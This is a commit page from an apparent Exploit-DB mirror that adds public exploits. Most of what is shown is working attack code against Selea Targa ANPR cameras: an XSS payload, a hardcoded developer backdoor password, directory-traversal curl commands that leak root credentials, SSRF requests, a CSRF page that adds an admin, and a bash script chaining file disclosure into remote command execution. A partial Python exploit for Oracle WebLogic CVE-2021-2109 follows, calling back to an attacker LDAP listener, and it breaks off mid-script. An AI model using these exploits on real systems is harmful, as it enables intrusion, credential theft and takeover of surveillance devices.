bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-01-23

Browse source 
15 changes to exploits/shellcodes

Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation
Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution
Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS
Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite
Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)
Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)
Selea Targa IP OCR-ANPR Camera - CSRF Add Admin
Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)
Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)
Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)
Library System 1.0 - Authentication Bypass Via SQL Injection
CASAP Automated Enrollment System 1.0 - Authentication Bypass
ERPNext 12.14.0 - SQL Injection (Authenticated)
Atlassian Confluence Widget Connector Macro - SSTI

Linux/x64 - Reverse (127.1.1.1:4444) Shell (/bin/sh) Shellcode (123 Bytes)
Linux/x86 - Socat Bind Shellcode (113 bytes)
Linux/x64 - Reverse (127.1.1.1:4444/TCP) Shell (/bin/sh) Shellcode (123 Bytes)
Linux/x86 - Bind Socat (0.0.0.0:1000/TCP) Shell (Bash) Shellcode (113 bytes)

Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)
Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)

Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)
This commit is contained in:
Offensive Security 2021-01-23 05:01:59 +00:00
parent aa473257e9
commit 3e80d07fdb
17 changed files with 2684 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

81
exploits/hardware/webapps/49454.txt Normal file
View file

@ -0,0 +1,81 @@
# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com
Selea Targa IP OCR-ANPR Camera Remote Stored XSS
Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model: iZero
Targa 512
Targa 504
Targa Semplice
Targa 704 TKM
Targa 805
Targa 710 INOX
Targa 750
Targa 704 ILB
Firmware: BLD201113005214
BLD201106163745
BLD200304170901
BLD200304170514
BLD200303143345
BLD191118145435
BLD191021180140
BLD191021180140
CPS: 4.013(201105)
3.100(200225)
3.005(191206)
3.005(191112)
Summary: IP camera with optical character recognition (OCR) software for automatic
number plate recognition (ANPR) also equipped with ADR system that enables it to read
the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
this camera suitable for all installation conditions. Its built-in OCR software works
as an automatic and independent system without the need of a computer, thus giving
autonomy to the device even in the event of an interruption in the connection between
the camera and the operations centre.
Desc: The application suffers from a stored XSS through a POST request. The issue is
triggered when input passed to the 'files_list' parameter is not properly sanitized
before being returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of an affected site.
Tested on: GNU/Linux 3.10.53 (armv7l)
PHP/5.6.22
selea_httpd
HttpServer/0.1
SeleaCPSHttpServer/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5614
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5614.php
07.11.2020
--
Remote Stored XSS:
------------------
POST /cgi-bin/get_file.php HTTP/1.1
Host: 192.168.1.17
name=Test&files_list=<marquee><h3>t00t</h3></marquee>
Unauthenticated Log Pollution Trigger XSS:
------------------------------------------
GET /get_log.php?type=system HTTP/1.1
Host: 192.168.1.17

122
exploits/hardware/webapps/49455.txt Normal file
View file

@ -0,0 +1,122 @@
# Exploit Title: Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com
Selea Targa IP OCR-ANPR Camera Developer Backdoor Config Overwrite
Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model: iZero
Targa 512
Targa 504
Targa Semplice
Targa 704 TKM
Targa 805
Targa 710 INOX
Targa 750
Targa 704 ILB
Firmware: BLD201113005214
BLD201106163745
BLD200304170901
BLD200304170514
BLD200303143345
BLD191118145435
BLD191021180140
BLD191021180140
CPS: 4.013(201105)
3.100(200225)
3.005(191206)
3.005(191112)
Summary: IP camera with optical character recognition (OCR) software for automatic
number plate recognition (ANPR) also equipped with ADR system that enables it to read
the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
this camera suitable for all installation conditions. Its built-in OCR software works
as an automatic and independent system without the need of a computer, thus giving
autonomy to the device even in the event of an interruption in the connection between
the camera and the operations centre.
Desc: There is a hard-coded password for a hidden and undocumented /dev.html page that
enables the vendor to enable configuration upload / overwrite to the affected device
using the checkManufacturer() function through an AJAX method.
======================================================================================
/dev.html:
----------
...
...
function checkManufacturer(){
var manufacturer=$.cookie('manufacturer');
if (manufacturer){ $('#set_manufacturer').val('Disable manufacturer'); $('#dev_page').show(); $('#config_restore').show(); }
else{ $('#set_manufacturer').val('Enable manufacturer'); $('#dev_page').hide(); $('#config_restore').hide();}
}
checkManufacturer();
function setMsg(msg){$('#dev_msg').html(msg); setTimeout(function(){$('#dev_msg').html("");},5000)};
$('#set_manufacturer').click(function(){
var manufacturer=$.cookie('manufacturer');
if (manufacturer){ $.cookie('manufacturer',null); location.reload(); }
else{
$.ajax({
url: "/cgi-bin/utils.php?cmd=DEVPASS&pwd="+md5($('#dev_pwd').val()),
timeout: 2000,
cache:false,
mimeType: 'text/plain'
}).done(function(result){
try{
var info=$.parseJSON(result);
if (info.auth=="OK"){
setManufacturerTimeout();
location.reload();
...
...
/cgi-bin/utils.php:
-------------------
...
...
$cmd=$_GET["cmd"];
if ($cmd=="DEVPASS"){
$pwd=$_GET["pwd"];
$info=new StdClass();
$info->auth=($pwd==md5("Selea781830"))?"OK":"ERROR";
print(json_encode($info, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES | JSON_NUMERIC_CHECK | JSON_PRETTY_PRINT));
exit();
}
...
...
======================================================================================
Tested on: GNU/Linux 3.10.53 (armv7l)
PHP/5.6.22
selea_httpd
HttpServer/0.1
SeleaCPSHttpServer/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5615
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5615.php
07.11.2020
--
$ curl http://192.168.1.17/cgi-bin/utils.php?cmd=DEVPASS&pwd=4654fa64de66a5ff0befde3c0203817b
{ "auth": "OK" }
OR
Navigate to /dev.html and enter password: Selea781830, enable config upload.

117
exploits/hardware/webapps/49456.txt Normal file
View file

@ -0,0 +1,117 @@
# Exploit Title: Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com
Selea Targa IP OCR-ANPR Camera Unauthenticated Directory Traversal File Disclosure
Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model: iZero
Targa 512
Targa 504
Targa Semplice
Targa 704 TKM
Targa 805
Targa 710 INOX
Targa 750
Targa 704 ILB
Firmware: BLD201113005214
BLD201106163745
BLD200304170901
BLD200304170514
BLD200303143345
BLD191118145435
BLD191021180140
BLD191021180140
CPS: 4.013(201105)
3.100(200225)
3.005(191206)
3.005(191112)
Summary: IP camera with optical character recognition (OCR) software for automatic
number plate recognition (ANPR) also equipped with ADR system that enables it to read
the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
this camera suitable for all installation conditions. Its built-in OCR software works
as an automatic and independent system without the need of a computer, thus giving
autonomy to the device even in the event of an interruption in the connection between
the camera and the operations centre.
Desc: The ANPR camera suffers from an unauthenticated arbitrary file disclosure vulnerability.
Input passed through the Download Archive in Storage page using get_file.php script is
not properly verified before being used to download files. This can be exploited to
disclose the contents of arbitrary and sensitive files via directory traversal attacks
and aid the attacker to disclose clear-text credentials resulting in authentication
bypass.
Tested on: GNU/Linux 3.10.53 (armv7l)
PHP/5.6.22
selea_httpd
HttpServer/0.1
SeleaCPSHttpServer/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5616
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5616.php
07.11.2020
--
$ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json
{
"viewers": {},
"root_pwd": "P@$$w0rd",
"operators": {}
}
$ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:99:99:nobody:/home:/bin/false
dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false
POST /cgi-bin/get_file.php HTTP/1.1
Host: 192.168.1.17
name=TESTINGUS&files_list=/etc/passwd
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-disposition: attachment; filename="TESTINGUS.tar"
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Length: 2048
Connection: close
Date: Wed, 09 Dec 2020 01:39:57 GMT
Server: selea_httpd
root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:99:99:nobody:/home:/bin/false
dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false

111
exploits/hardware/webapps/49457.txt Normal file
View file

@ -0,0 +1,111 @@
# Exploit Title: Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com
Selea Targa IP OCR-ANPR Camera Unauthenticated SSRF
Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model: iZero
Targa 512
Targa 504
Targa Semplice
Targa 704 TKM
Targa 805
Targa 710 INOX
Targa 750
Targa 704 ILB
Firmware: BLD201113005214
BLD201106163745
BLD200304170901
BLD200304170514
BLD200303143345
BLD191118145435
BLD191021180140
BLD191021180140
CPS: 4.013(201105)
3.100(200225)
3.005(191206)
3.005(191112)
Summary: IP camera with optical character recognition (OCR) software for automatic
number plate recognition (ANPR) also equipped with ADR system that enables it to read
the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
this camera suitable for all installation conditions. Its built-in OCR software works
as an automatic and independent system without the need of a computer, thus giving
autonomy to the device even in the event of an interruption in the connection between
the camera and the operations centre.
Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the
Selea ANPR camera within several functionalities. The application parses user supplied
data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image
request or check DNS for IP notification. Since no validation is carried out on the
parameters, an attacker can specify an external domain and force the application to
make an HTTP request to an arbitrary destination host. This can be used by an external
attacker for example to bypass firewalls and initiate a service and network enumeration
on the internal network through the affected application.
Tested on: GNU/Linux 3.10.53 (armv7l)
PHP/5.6.22
selea_httpd
HttpServer/0.1
SeleaCPSHttpServer/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5617
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php
07.11.2020
--
Request:
--------
POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1
Host: 192.168.1.17
{"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://127.0.0.1:80","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""}
Response (port 80):
-------------------
{"bandwidth": 1.3571428571428572,"elapsed_ms": 14,"result": "OK","size": 19}
Response (port 8080):
---------------------
{"code": 500,"error": "Error sending notification: Connection refused"}
Request:
--------
POST /cps/test_url HTTP/1.1
Host: 192.168.1.17
{"url":"http://127.0.0.1:80"}:
Response (port 80):
-------------------
{"elapsed_ms": 2,"jpeg": "GGh0bWw+CjxoZWFkPgo8dGl0bGU+U2VsZWEgQU5QU4BjYW1lcmE8L3RpdGxlPgo8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwO1VSTD0vbhl2ZS5odG1sIj4KPC9oZWFkPgo8Ym9keT48L2JvJHk+CjwvaHRtbD4KCg==","result": "OK"}
Response (port 8081):
---------------------
{"elapsed_ms": 1,"error": "Connection refused"}

117
exploits/hardware/webapps/49458.html Normal file
View file

@ -0,0 +1,117 @@
# Exploit Title: Selea Targa IP OCR-ANPR Camera - CSRF Add Admin
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com
Selea Targa IP OCR-ANPR Camera CSRF Add Admin Exploit
Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model: iZero
Targa 512
Targa 504
Targa Semplice
Targa 704 TKM
Targa 805
Targa 710 INOX
Targa 750
Targa 704 ILB
Firmware: BLD201113005214
BLD201106163745
BLD200304170901
BLD200304170514
BLD200303143345
BLD191118145435
BLD191021180140
BLD191021180140
CPS: 4.013(201105)
3.100(200225)
3.005(191206)
3.005(191112)
Summary: IP camera with optical character recognition (OCR) software for automatic
number plate recognition (ANPR) also equipped with ADR system that enables it to read
the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
this camera suitable for all installation conditions. Its built-in OCR software works
as an automatic and independent system without the need of a computer, thus giving
autonomy to the device even in the event of an interruption in the connection between
the camera and the operations centre.
Desc: The application interface allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges if a logged-in user visits a malicious
web site.
Tested on: GNU/Linux 3.10.53 (armv7l)
PHP/5.6.22
selea_httpd
HttpServer/0.1
SeleaCPSHttpServer/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5618
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5618.php
07.11.2020
--
Add Admin:
----------
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/192.168.1.17\/save_params.php", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=cfgboundary-----------------------1607475234133");
xhr.withCredentials = true;
var body = "--cfgboundary-----------------------1607475234133\r\n" +
"Content-Disposition: form-data; name=\"set_params\"\r\n" +
"\r\n" +
"upload\r\n" +
"--cfgboundary-----------------------1607475234133\r\n" +
"Content-Disposition: form-data; name=\"user_file\"; filename=\"set_params.dat\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"[SECURITY.USERS]\r\n" +
"security-users-0-username = testingus\r\n" +
"security-users-0-password = testingus\r\n" +
"security-users-0-rights = 2\r\n" +
"security-users-1-username = \r\n" +
"security-users-1-password = \r\n" +
"security-users-1-rights = 0\r\n" +
"security-users-2-username = \r\n" +
"security-users-2-password = \r\n" +
"security-users-2-rights = 0\r\n" +
"security-users-3-username = \r\n" +
"security-users-3-password = \r\n" +
"security-users-3-rights = 0\r\n" +
"security-allow_viewers_storage_access = 1\r\n" +
"CFG_ROOTPASS = admin\r\n" +
"\r\n" +
"--cfgboundary-----------------------1607475234133--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Add Admin" onclick="submitRequest();" />
</form>
</body>
</html>

67
exploits/hardware/webapps/49459.txt Normal file
View file

@ -0,0 +1,67 @@
# Exploit Title: Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com
Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure
Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model: iZero
Targa 512
Targa 504
Targa Semplice
Targa 704 TKM
Targa 805
Targa 710 INOX
Targa 750
Targa 704 ILB
Firmware: BLD201113005214
BLD201106163745
BLD200304170901
BLD200304170514
BLD200303143345
BLD191118145435
BLD191021180140
BLD191021180140
CPS: 4.013(201105)
3.100(200225)
3.005(191206)
3.005(191112)
Summary: IP camera with optical character recognition (OCR) software for automatic
number plate recognition (ANPR) also equipped with ADR system that enables it to read
the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
this camera suitable for all installation conditions. Its built-in OCR software works
as an automatic and independent system without the need of a computer, thus giving
autonomy to the device even in the event of an interruption in the connection between
the camera and the operations centre.
Desc: The ANPR camera suffers from an unauthenticated and unauthorized live stream
disclosure when p1.mjpg or p1.264 is called.
Tested on: GNU/Linux 3.10.53 (armv7l)
PHP/5.6.22
selea_httpd
HttpServer/0.1
SeleaCPSHttpServer/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5619
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php
07.11.2020
--
Connection to RTP/RTSP stream: rtsp://192.168.1.17/p1.264
Connection to M-JPEG stream: http://192.168.1.17/p1.mjpg

109
exploits/hardware/webapps/49460.sh Executable file
View file

@ -0,0 +1,109 @@
# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com
#!/bin/bash
#
# Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution
#
#
# Vendor: Selea s.r.l.
# Product web page: https://www.selea.com
# Affected version: Model: iZero
# Targa 512
# Targa 504
# Targa Semplice
# Targa 704 TKM
# Targa 805
# Targa 710 INOX
# Targa 750
# Targa 704 ILB
# Firmware: BLD201113005214
# BLD201106163745
# BLD200304170901
# BLD200304170514
# BLD200303143345
# BLD191118145435
# BLD191021180140
# BLD191021180140
# CPS: 4.013(201105)
# 3.100(200225)
# 3.005(191206)
# 3.005(191112)
#
# Summary: IP camera with optical character recognition (OCR) software for automatic
# number plate recognition (ANPR) also equipped with ADR system that enables it to read
# the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
# of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
# plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
# this camera suitable for all installation conditions. Its built-in OCR software works
# as an automatic and independent system without the need of a computer, thus giving
# autonomy to the device even in the event of an interruption in the connection between
# the camera and the operations centre.
#
# Desc: Selea suffers from an authenticated command injection vulnerability. This can be
# exploited to inject and execute arbitrary shell commands as the www-data user through
# the 'addr' and 'port' HTTP GET parameters in utils.php page. Chaining the unauthenticated
# LFI issue an attacker can grab credentials, authenticate and execute system commands.
#
# =====================================================================================
# /mnt/app/scripts/address_check.sh:
# ----------------------------------
#
# 01: #!/bin/sh
# 02: . /mnt/app/scripts/env.sh
# 03: . /mnt/app/scripts/log.sh
# 04:
# 05: CMD="$1"
# 06: ADDR="$2"
# 07: PORT="$3"
# 08:
# 09: if [ "$CMD" == "ping" ]; then
# 10: RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 )
# 11: elif [ "$CMD" == "port" ]; then
# 12: log "/usr/bin/nc -w 1 -v -z $ADDR $PORT"
# 13: RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 )
# 14: fi
# 15:
# 16: echo -e "$RESULT"
#
# =====================================================================================
#
# Tested on: GNU/Linux 3.10.53 (armv7l)
# PHP/5.6.22
# selea_httpd
# HttpServer/0.1
# SeleaCPSHttpServer/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5620
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php
#
#
# 07.11.2020
#
#
# PoC chained exploit (as admin):
#
# solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id
# Password found: testingus
# Using Authorization: YWRtaW46dGVzdGluZ3VzCg==
# Using command: id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
#
IP=$1
CMD=$2
PWD=`curl -s http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd": "\K.*?(?=",)'`
echo 'Password found: '${PWD}
AUTH=$(echo admin:${PWD} | base64)
echo 'Using Authorization: '${AUTH}
echo 'Using command: '${CMD}
curl -s "http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\$(${CMD})&type=port&port=80" -H "Authorization: Basic ${AUTH}" |grep -oP '1.3.3.7\K.*?(?=")'

203
exploits/java/webapps/49461.py Executable file
View file

@ -0,0 +1,203 @@
# Exploit Title: Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)
# Date: 2021-01-21
# Exploit Author: Photubias
# Vendor Advisory: [1] https://www.oracle.com/security-alerts/cpujan2021.html
# Vendor Homepage: https://www.oracle.com
# Version: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0 (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1)
# Tested on: WebLogic 14.1.1.0 with JDK-8u181 on Windows 10 20H2
# CVE: CVE-2021-2109
#!/usr/bin/env python3
'''
Copyright 2021 Photubias(c)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
File name CVE-2021-2109.py
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
This is a native implementation without requirements, written in Python 3.
Works equally well on Windows as Linux (as MacOS, probably ;-)
Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
from https://github.com/welk1n/JNDI-Injection-Exploit
to be in the same folder
'''
import urllib.request, urllib.parse, http.cookiejar, ssl
import sys, os, optparse, subprocess, threading, time
## Static vars; change at will, but recommend leaving as is
sURL = 'http://192.168.0.100:7001'
iTimeout = 5
oRun = None
## Ignore unsigned certs, if any because WebLogic is default HTTP
ssl._create_default_https_context = ssl._create_unverified_context
class runJar(threading.Thread):
def __init__(self, sJarFile, sCMD, sAddress):
self.stdout = []
self.stderr = ''
self.cmd = sCMD
self.addr = sAddress
self.jarfile = sJarFile
self.proc = None
threading.Thread.__init__(self)
def run(self):
self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True)
for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line)
for line in iter(self.proc.stderr.readline, ''): self.stderr += line
def findJNDI():
sCurDir = os.getcwd()
sFile = ''
for file in os.listdir(sCurDir):
if 'JNDI' in file and '.jar' in file:
sFile = file
print('[+] Found and using ' + sFile)
return sFile
def findJAVA(bVerbose):
try:
oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
except:
exit('[-] Error: java not found, needed to run the JAR file\n Please make sure to have "java" in your path.')
sResult = list(oProc.stdout)[0].decode()
if bVerbose: print('[+] Found Java: ' + sResult)
def checkParams(options, args):
if args: sHost = args[0]
else:
sHost = input('[?] Please enter the URL ['+sURL+'] : ')
if sHost == '': sHost = sURL
if sHost[-1:] == '/': sHost = sHost[:-1]
if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost
if options.username: sUser = options.username
else:
sUser = input('[?] Username [weblogic] : ')
if sUser == '': sUser = 'weblogic'
if options.password: sPass = options.password
else:
sPass = input('[?] Password [Passw0rd-] : ')
if sPass == '': sPass = 'Passw0rd-'
if options.command: sCMD = options.command
else:
sCMD = input('[?] Command to run [calc] : ')
if sCMD == '': sCMD = 'calc'
if options.listenaddr: sLHOST = options.listenaddr
else:
sLHOST = input('[?] Local IP to connect back to [192.168.0.10] : ')
if sLHOST == '': sLHOST = '192.168.0.10'
if options.verbose: bVerbose = True
else: bVerbose = False
return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose)
def startListener(sJarFile, sCMD, sAddress, bVerbose):
global oRun
oRun = runJar(sJarFile, sCMD, sAddress)
oRun.start()
print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint')
oRun.join(3)
if not oRun.stderr == '':
exit('[-] Error starting Java listener:\n' + oRun.stderr)
bThisLine=False
if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180')
for line in oRun.stdout:
if bThisLine: return line.split('/')[3].replace('\n','')
if 'JDK 1.8' in line: bThisLine = True
def endIt():
global oRun
print('[+] Closing threads')
if oRun: oRun.proc.terminate()
exit(0)
def main():
usage = (
'usage: %prog [options] URL \n'
' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n'
' in the current working folder\n'
'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n'
'Only works when hacker is reachable via an IPv4 address\n'
'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n'
'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l 192.168.0.10 http://192.168.0.100:7001\n'
'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add'
)
parser = optparse.OptionParser(usage=usage)
parser.add_option('--username', '-u', dest='username')
parser.add_option('--password', '-p', dest='password')
parser.add_option('--command', '-c', dest='command')
parser.add_option('--listen', '-l', dest='listenaddr')
parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False)
## Get or ask for the vars
(options, args) = parser.parse_args()
(sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args)
## Verify Java and JAR file
sJarFile = findJNDI()
findJAVA(bVerbose)
## Keep track of cookies between requests
cj = http.cookiejar.CookieJar()
oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
print('[+] Verifying reachability')
## Get the cookie
oRequest = urllib.request.Request(url = sHost + '/console/')
oResponse = oOpener.open(oRequest, timeout = iTimeout)
for c in cj:
if c.name == 'ADMINCONSOLESESSION':
if bVerbose: print('[+] Got cookie "' + c.value + '"')
## Logging in
lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'}
lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'}
oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders)
oResponse = oOpener.open(oRequest, timeout = iTimeout)
sResult = oResponse.read().decode(errors='ignore').split('\r\n')
bSuccess = True
for line in sResult:
if 'Authentication Denied' in line: bSuccess = False
if bSuccess: print('[+] Succesfully logged in!\n')
else: exit('[-] Authentication Denied')
## Launch the LDAP listener and retrieve the random endpoint value
sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose)
if bVerbose: print('[+] Got Java value: ' + sRandom)
## This is the actual vulnerability, retrieve LDAP data from victim which the runs on victim, it bypasses verification because IP is written as "127.0.0;1" instead of "127.0.0.1"
print('\n[+] Firing exploit now, hold on')
## http://192.168.0.100:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/5r5mu7;AdminServer-)
sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3]
